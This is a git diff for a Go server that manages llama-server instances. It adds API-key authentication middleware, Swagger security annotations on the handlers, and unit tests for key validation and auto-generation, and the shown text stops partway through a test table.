func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
|
||||
return &Handler{
|
||||
InstanceManager: im,
|
||||
config: config,
|
||||
cfg: cfg,
|
||||
}
|
||||
}
|
||||
|
||||
@@ -29,6 +32,7 @@ func NewHandler(im InstanceManager, config Config) *Handler {
|
||||
// @Summary Get help for llama server
|
||||
// @Description Returns the help text for the llama server command
|
||||
// @Tags server
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces text/plain
|
||||
// @Success 200 {string} string "Help text"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -50,6 +54,7 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
|
||||
// @Summary Get version of llama server
|
||||
// @Description Returns the version of the llama server command
|
||||
// @Tags server
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces text/plain
|
||||
// @Success 200 {string} string "Version information"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -71,6 +76,7 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
|
||||
// @Summary List available devices for llama server
|
||||
// @Description Returns a list of available devices for the llama server
|
||||
// @Tags server
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces text/plain
|
||||
// @Success 200 {string} string "List of devices"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -92,6 +98,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
|
||||
// @Summary List all instances
|
||||
// @Description Returns a list of all instances managed by the server
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Success 200 {array} Instance "List of instances"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -116,6 +123,7 @@ func (h *Handler) ListInstances() http.HandlerFunc {
|
||||
// @Summary Create and start a new instance
|
||||
// @Description Creates a new instance with the provided configuration options
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Accept json
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
@@ -132,13 +140,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
var options CreateInstanceOptions
|
||||
var options instance.CreateInstanceOptions
|
||||
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
||||
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.CreateInstance(name, &options)
|
||||
inst, err := h.InstanceManager.CreateInstance(name, &options)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
@@ -146,7 +154,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
w.WriteHeader(http.StatusCreated)
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -157,6 +165,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
||||
// @Summary Get details of a specific instance
|
||||
// @Description Returns the details of a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Instance details"
|
||||
@@ -171,14 +180,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.GetInstance(name)
|
||||
inst, err := h.InstanceManager.GetInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -189,6 +198,7 @@ func (h *Handler) GetInstance() http.HandlerFunc {
|
||||
// @Summary Update an instance's configuration
|
||||
// @Description Updates the configuration of a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Accept json
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
@@ -205,20 +215,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
var options CreateInstanceOptions
|
||||
var options instance.CreateInstanceOptions
|
||||
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
||||
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.UpdateInstance(name, &options)
|
||||
inst, err := h.InstanceManager.UpdateInstance(name, &options)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -229,6 +239,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
|
||||
// @Summary Start a stopped instance
|
||||
// @Description Starts a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Started instance details"
|
||||
@@ -243,14 +254,14 @@ func (h *Handler) StartInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.StartInstance(name)
|
||||
inst, err := h.InstanceManager.StartInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -261,6 +272,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
|
||||
// @Summary Stop a running instance
|
||||
// @Description Stops a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Stopped instance details"
|
||||
@@ -275,14 +287,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.StopInstance(name)
|
||||
inst, err := h.InstanceManager.StopInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -293,6 +305,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
|
||||
// @Summary Restart a running instance
|
||||
// @Description Restarts a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 {object} Instance "Restarted instance details"
|
||||
@@ -307,14 +320,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.RestartInstance(name)
|
||||
inst, err := h.InstanceManager.RestartInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
||||
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
@@ -325,6 +338,7 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
|
||||
// @Summary Delete an instance
|
||||
// @Description Stops and removes a specific instance by name
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 204 "No Content"
|
||||
// @Failure 400 {string} string "Invalid name format"
|
||||
@@ -351,6 +365,7 @@ func (h *Handler) DeleteInstance() http.HandlerFunc {
|
||||
// @Summary Get logs from a specific instance
|
||||
// @Description Returns the logs from a specific instance by name with optional line limit
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Param lines query string false "Number of lines to retrieve (default: all lines)"
|
||||
// @Produces text/plain
|
||||
@@ -377,13 +392,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.GetInstance(name)
|
||||
inst, err := h.InstanceManager.GetInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
logs, err := instance.GetLogs(num_lines)
|
||||
logs, err := inst.GetLogs(num_lines)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
@@ -398,6 +413,7 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
|
||||
// @Summary Proxy requests to a specific instance
|
||||
// @Description Forwards HTTP requests to the llama-server instance running on a specific port
|
||||
// @Tags instances
|
||||
// @Security ApiKeyAuth
|
||||
// @Param name path string true "Instance Name"
|
||||
// @Success 200 "Request successfully proxied to instance"
|
||||
// @Failure 400 {string} string "Invalid name format"
|
||||
@@ -413,19 +429,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
instance, err := h.InstanceManager.GetInstance(name)
|
||||
inst, err := h.InstanceManager.GetInstance(name)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
if !instance.Running {
|
||||
if !inst.Running {
|
||||
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
||||
return
|
||||
}
|
||||
|
||||
// Get the cached proxy for this instance
|
||||
proxy, err := instance.GetProxy()
|
||||
proxy, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
@@ -462,6 +478,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
|
||||
// @Summary List instances in OpenAI-compatible format
|
||||
// @Description Returns a list of instances in a format compatible with OpenAI API
|
||||
// @Tags openai
|
||||
// @Security ApiKeyAuth
|
||||
// @Produces json
|
||||
// @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
|
||||
// @Failure 500 {string} string "Internal Server Error"
|
||||
@@ -475,11 +492,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
|
||||
}
|
||||
|
||||
openaiInstances := make([]OpenAIInstance, len(instances))
|
||||
for i, instance := range instances {
|
||||
for i, inst := range instances {
|
||||
openaiInstances[i] = OpenAIInstance{
|
||||
ID: instance.Name,
|
||||
ID: inst.Name,
|
||||
Object: "model",
|
||||
Created: instance.Created,
|
||||
Created: inst.Created,
|
||||
OwnedBy: "llamactl",
|
||||
}
|
||||
}
|
||||
@@ -499,8 +516,9 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
|
||||
|
||||
// OpenAIProxy godoc
|
||||
// @Summary OpenAI-compatible proxy endpoint
|
||||
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body
|
||||
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
|
||||
// @Tags openai
|
||||
// @Security ApiKeyAuth
|
||||
// @Accept json
|
||||
// @Produces json
|
||||
// @Success 200 "OpenAI response"
|
||||
@@ -530,19 +548,19 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
// Route to the appropriate instance based on model name
|
||||
instance, err := h.InstanceManager.GetInstance(modelName)
|
||||
// Route to the appropriate inst based on model name
|
||||
inst, err := h.InstanceManager.GetInstance(modelName)
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
if !instance.Running {
|
||||
if !inst.Running {
|
||||
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
||||
return
|
||||
}
|
||||
|
||||
proxy, err := instance.GetProxy()
|
||||
proxy, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
||||
return
|
||||
189
pkg/server/middleware.go
Normal file
189
pkg/server/middleware.go
Normal file
@@ -0,0 +1,189 @@
|
||||
package server
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"crypto/subtle"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"llamactl/pkg/config"
|
||||
"log"
|
||||
"net/http"
|
||||
"os"
|
||||
"strings"
|
||||
)
|
||||
|
||||
type KeyType int
|
||||
|
||||
const (
|
||||
KeyTypeInference KeyType = iota
|
||||
KeyTypeManagement
|
||||
)
|
||||
|
||||
type APIAuthMiddleware struct {
|
||||
requireInferenceAuth bool
|
||||
inferenceKeys map[string]bool
|
||||
requireManagementAuth bool
|
||||
managementKeys map[string]bool
|
||||
}
|
||||
|
||||
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
|
||||
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
|
||||
|
||||
var generated bool = false
|
||||
|
||||
inferenceAPIKeys := make(map[string]bool)
|
||||
managementAPIKeys := make(map[string]bool)
|
||||
|
||||
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
||||
|
||||
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
|
||||
key := generateAPIKey(KeyTypeManagement)
|
||||
managementAPIKeys[key] = true
|
||||
generated = true
|
||||
fmt.Printf("%s\n⚠️ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
||||
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
|
||||
}
|
||||
for _, key := range authCfg.ManagementKeys {
|
||||
managementAPIKeys[key] = true
|
||||
}
|
||||
|
||||
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
|
||||
key := generateAPIKey(KeyTypeInference)
|
||||
inferenceAPIKeys[key] = true
|
||||
generated = true
|
||||
fmt.Printf("%s\n⚠️ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
||||
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
|
||||
}
|
||||
for _, key := range authCfg.InferenceKeys {
|
||||
inferenceAPIKeys[key] = true
|
||||
}
|
||||
|
||||
if generated {
|
||||
fmt.Printf("%s\n⚠️ IMPORTANT\n%s\n", banner, banner)
|
||||
fmt.Println("• These keys are auto-generated and will change on restart")
|
||||
fmt.Println("• For production, add explicit keys to your configuration")
|
||||
fmt.Println("• Copy these keys before they disappear from the terminal")
|
||||
fmt.Println(banner)
|
||||
}
|
||||
|
||||
return &APIAuthMiddleware{
|
||||
requireInferenceAuth: authCfg.RequireInferenceAuth,
|
||||
inferenceKeys: inferenceAPIKeys,
|
||||
requireManagementAuth: authCfg.RequireManagementAuth,
|
||||
managementKeys: managementAPIKeys,
|
||||
}
|
||||
}
|
||||
|
||||
// generateAPIKey creates a cryptographically secure API key
|
||||
func generateAPIKey(keyType KeyType) string {
|
||||
// Generate 32 random bytes (256 bits)
|
||||
randomBytes := make([]byte, 32)
|
||||
|
||||
var prefix string
|
||||
|
||||
switch keyType {
|
||||
case KeyTypeInference:
|
||||
prefix = "sk-inference"
|
||||
case KeyTypeManagement:
|
||||
prefix = "sk-management"
|
||||
default:
|
||||
prefix = "sk-unknown"
|
||||
}
|
||||
|
||||
if _, err := rand.Read(randomBytes); err != nil {
|
||||
log.Printf("Warning: Failed to generate secure random key, using fallback")
|
||||
// Fallback to a less secure method if crypto/rand fails
|
||||
return fmt.Sprintf("%s-fallback-%d", prefix, os.Getpid())
|
||||
}
|
||||
|
||||
// Convert to hex and add prefix
|
||||
return fmt.Sprintf("%s-%s", prefix, hex.EncodeToString(randomBytes))
|
||||
}
|
||||
|
||||
// AuthMiddleware returns a middleware that checks API keys for the given key type
|
||||
func (a *APIAuthMiddleware) AuthMiddleware(keyType KeyType) func(http.Handler) http.Handler {
|
||||
return func(next http.Handler) http.Handler {
|
||||
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method == "OPTIONS" {
|
||||
next.ServeHTTP(w, r)
|
||||
return
|
||||
}
|
||||
|
||||
apiKey := a.extractAPIKey(r)
|
||||
if apiKey == "" {
|
||||
a.unauthorized(w, "Missing API key")
|
||||
return
|
||||
}
|
||||
|
||||
var isValid bool
|
||||
switch keyType {
|
||||
case KeyTypeInference:
|
||||
// Management keys also work for OpenAI endpoints (higher privilege)
|
||||
isValid = a.isValidKey(apiKey, KeyTypeInference) || a.isValidKey(apiKey, KeyTypeManagement)
|
||||
case KeyTypeManagement:
|
||||
isValid = a.isValidKey(apiKey, KeyTypeManagement)
|
||||
default:
|
||||
isValid = false
|
||||
}
|
||||
|
||||
if !isValid {
|
||||
a.unauthorized(w, "Invalid API key")
|
||||
return
|
||||
}
|
||||
|
||||
next.ServeHTTP(w, r)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// extractAPIKey extracts the API key from the request
|
||||
func (a *APIAuthMiddleware) extractAPIKey(r *http.Request) string {
|
||||
// Check Authorization header: "Bearer sk-..."
|
||||
if auth := r.Header.Get("Authorization"); auth != "" {
|
||||
if after, ok := strings.CutPrefix(auth, "Bearer "); ok {
|
||||
return after
|
||||
}
|
||||
}
|
||||
|
||||
// Check X-API-Key header
|
||||
if apiKey := r.Header.Get("X-API-Key"); apiKey != "" {
|
||||
return apiKey
|
||||
}
|
||||
|
||||
// Check query parameter
|
||||
if apiKey := r.URL.Query().Get("api_key"); apiKey != "" {
|
||||
return apiKey
|
||||
}
|
||||
|
||||
return ""
|
||||
}
|
||||
|
||||
// isValidKey checks if the provided API key is valid for the given key type
|
||||
func (a *APIAuthMiddleware) isValidKey(providedKey string, keyType KeyType) bool {
|
||||
var validKeys map[string]bool
|
||||
|
||||
switch keyType {
|
||||
case KeyTypeInference:
|
||||
validKeys = a.inferenceKeys
|
||||
case KeyTypeManagement:
|
||||
validKeys = a.managementKeys
|
||||
default:
|
||||
return false
|
||||
}
|
||||
|
||||
for validKey := range validKeys {
|
||||
if len(providedKey) == len(validKey) &&
|
||||
subtle.ConstantTimeCompare([]byte(providedKey), []byte(validKey)) == 1 {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// unauthorized sends an unauthorized response
|
||||
func (a *APIAuthMiddleware) unauthorized(w http.ResponseWriter, message string) {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
w.WriteHeader(http.StatusUnauthorized)
|
||||
response := fmt.Sprintf(`{"error": {"message": "%s", "type": "authentication_error"}}`, message)
|
||||
w.Write([]byte(response))
|
||||
}
|
||||
354
pkg/server/middleware_test.go
Normal file
354
pkg/server/middleware_test.go
Normal file
@@ -0,0 +1,354 @@
|
||||
package server_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/server"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestAuthMiddleware(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
keyType server.KeyType
|
||||
inferenceKeys []string
|
||||
managementKeys []string
|
||||
requestKey string
|
||||
method string
|
||||
expectedStatus int
|
||||
}{
|
||||
// Valid key tests
|
||||
{
|
||||
name: "valid inference key for inference",
|
||||
keyType: server.KeyTypeInference,
|
||||
inferenceKeys: []string{"sk-inference-valid123"},
|
||||
requestKey: "sk-inference-valid123",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
{
|
||||
name: "valid management key for inference", // Management keys work for inference
|
||||
keyType: server.KeyTypeInference,
|
||||
managementKeys: []string{"sk-management-admin123"},
|
||||
requestKey: "sk-management-admin123",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
{
|
||||
name: "valid management key for management",
|
||||
keyType: server.KeyTypeManagement,
|
||||
managementKeys: []string{"sk-management-admin123"},
|
||||
requestKey: "sk-management-admin123",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
|
||||
// Invalid key tests
|
||||
{
|
||||
name: "inference key for management should fail",
|
||||
keyType: server.KeyTypeManagement,
|
||||
inferenceKeys: []string{"sk-inference-user123"},
|
||||
requestKey: "sk-inference-user123",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusUnauthorized,
|
||||
},
|
||||
{
|
||||
name: "invalid inference key",
|
||||
keyType: server.KeyTypeInference,
|
||||
inferenceKeys: []string{"sk-inference-valid123"},
|
||||
requestKey: "sk-inference-invalid",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusUnauthorized,
|
||||
},
|
||||
{
|
||||
name: "missing inference key",
|
||||
keyType: server.KeyTypeInference,
|
||||
inferenceKeys: []string{"sk-inference-valid123"},
|
||||
requestKey: "",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusUnauthorized,
|
||||
},
|
||||
{
|
||||
name: "invalid management key",
|
||||
keyType: server.KeyTypeManagement,
|
||||
managementKeys: []string{"sk-management-valid123"},
|
||||
requestKey: "sk-management-invalid",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusUnauthorized,
|
||||
},
|
||||
{
|
||||
name: "missing management key",
|
||||
keyType: server.KeyTypeManagement,
|
||||
managementKeys: []string{"sk-management-valid123"},
|
||||
requestKey: "",
|
||||
method: "GET",
|
||||
expectedStatus: http.StatusUnauthorized,
|
||||
},
|
||||
|
||||
// OPTIONS requests should always pass
|
||||
{
|
||||
name: "OPTIONS request bypasses inference auth",
|
||||
keyType: server.KeyTypeInference,
|
||||
inferenceKeys: []string{"sk-inference-valid123"},
|
||||
requestKey: "",
|
||||
method: "OPTIONS",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
{
|
||||
name: "OPTIONS request bypasses management auth",
|
||||
keyType: server.KeyTypeManagement,
|
||||
managementKeys: []string{"sk-management-valid123"},
|
||||
requestKey: "",
|
||||
method: "OPTIONS",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
|
||||
// Cross-key-type validation
|
||||
{
|
||||
name: "management key works for inference endpoint",
|
||||
keyType: server.KeyTypeInference,
|
||||
inferenceKeys: []string{},
|
||||
managementKeys: []string{"sk-management-admin"},
|
||||
requestKey: "sk-management-admin",
|
||||
method: "POST",
|
||||
expectedStatus: http.StatusOK,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
cfg := config.AuthConfig{
|
||||
InferenceKeys: tt.inferenceKeys,
|
||||
ManagementKeys: tt.managementKeys,
|
||||
}
|
||||
middleware := server.NewAPIAuthMiddleware(cfg)
|
||||
|
||||
// Create test request
|
||||
req := httptest.NewRequest(tt.method, "/test", nil)
|
||||
if tt.requestKey != "" {
|
||||
req.Header.Set("Authorization", "Bearer "+tt.requestKey)
|
||||
}
|
||||
|
||||
// Create test handler using the appropriate middleware
|
||||
var handler http.Handler
|
||||
if tt.keyType == server.KeyTypeInference {
|
||||
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
} else {
|
||||
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
}
|
||||
|
||||
// Execute request
|
||||
recorder := httptest.NewRecorder()
|
||||
handler.ServeHTTP(recorder, req)
|
||||
|
||||
if recorder.Code != tt.expectedStatus {
|
||||
t.Errorf("AuthMiddleware() status = %v, expected %v", recorder.Code, tt.expectedStatus)
|
||||
}
|
||||
|
||||
// Check that unauthorized responses have proper format
|
||||
if recorder.Code == http.StatusUnauthorized {
|
||||
contentType := recorder.Header().Get("Content-Type")
|
||||
if contentType != "application/json" {
|
||||
t.Errorf("Unauthorized response Content-Type = %v, expected application/json", contentType)
|
||||
}
|
||||
|
||||
body := recorder.Body.String()
|
||||
if !strings.Contains(body, `"type": "authentication_error"`) {
|
||||
t.Errorf("Unauthorized response missing proper error type: %v", body)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestGenerateAPIKey(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
keyType server.KeyType
|
||||
}{
|
||||
{"inference key generation", server.KeyTypeInference},
|
||||
{"management key generation", server.KeyTypeManagement},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Test auto-generation by creating config that will trigger it
|
||||
var config config.AuthConfig
|
||||
if tt.keyType == server.KeyTypeInference {
|
||||
config.RequireInferenceAuth = true
|
||||
config.InferenceKeys = []string{} // Empty to trigger generation
|
||||
} else {
|
||||
config.RequireManagementAuth = true
|
||||
config.ManagementKeys = []string{} // Empty to trigger generation
|
||||
}
|
||||
|
||||
// Create middleware - this should trigger key generation
|
||||
middleware := server.NewAPIAuthMiddleware(config)
|
||||
|
||||
// Test that auth is required (meaning a key was generated)
|
||||
req := httptest.NewRequest("GET", "/", nil)
|
||||
recorder := httptest.NewRecorder()
|
||||
|
||||
var handler http.Handler
|
||||
if tt.keyType == server.KeyTypeInference {
|
||||
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
} else {
|
||||
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
}
|
||||
|
||||
handler.ServeHTTP(recorder, req)
|
||||
|
||||
// Should be unauthorized without a key (proving that a key was generated and auth is working)
|
||||
if recorder.Code != http.StatusUnauthorized {
|
||||
t.Errorf("Expected unauthorized without key, got status %v", recorder.Code)
|
||||
}
|
||||
|
||||
// Test uniqueness by creating another middleware instance
|
||||
middleware2 := server.NewAPIAuthMiddleware(config)
|
||||
|
||||
req2 := httptest.NewRequest("GET", "/", nil)
|
||||
recorder2 := httptest.NewRecorder()
|
||||
|
||||
if tt.keyType == server.KeyTypeInference {
|
||||
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
handler2.ServeHTTP(recorder2, req2)
|
||||
} else {
|
||||
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}))
|
||||
handler2.ServeHTTP(recorder2, req2)
|
||||
}
|
||||
|
||||
// Both should require auth (proving keys were generated for both instances)
|
||||
if recorder2.Code != http.StatusUnauthorized {
|
||||
t.Errorf("Expected unauthorized for second middleware without key, got status %v", recorder2.Code)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestAutoGeneration(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
requireInference bool
|
||||
requireManagement bool
|
||||
providedInference []string
|
||||
providedManagement []string
|
||||
shouldGenerateInf bool // Whether inference key should be generated
|
||||
shouldGenerateMgmt bool // Whether management key should be generated
|
||||
}{
|
||||
{
|
||||
name: "inference auth required, keys provided - no generation",
|
||||
requireInference: true,
|
||||
requireManagement: false,
|
||||
providedInference: []string{"sk-inference-provided"},
|
||||
providedManagement: []string{},
|
||||
shouldGenerateInf: false,
|
||||
shouldGenerateMgmt: false,
|
||||
},
|
||||
{
|
||||
name: "inference auth required, no keys - should auto-generate",
|
||||
requireInference: true,
|
||||
requireManagement: false,
|
||||
providedInference: []string{},
|
||||
providedManagement: []string{},
|
||||
shouldGenerateInf: true,
|
||||
shouldGenerateMgmt: false,
|
||||
},
|
||||
{
|
||||
name: "management auth required, keys provided - no generation",
|
||||
requireInference: false,
|
||||
requireManagement: true,
|
||||
providedInference: []string{},
|
||||
providedManagement: []string{"sk-management-provided"},
|
||||
shouldGenerateInf: false,
|
||||
shouldGenerateMgmt: false,
|
||||
},
|
||||
{
|
||||
name: "management auth required, no keys - should auto-generate",
|
||||
requireInference: false,
|
||||
requireManagement: true,
|
||||
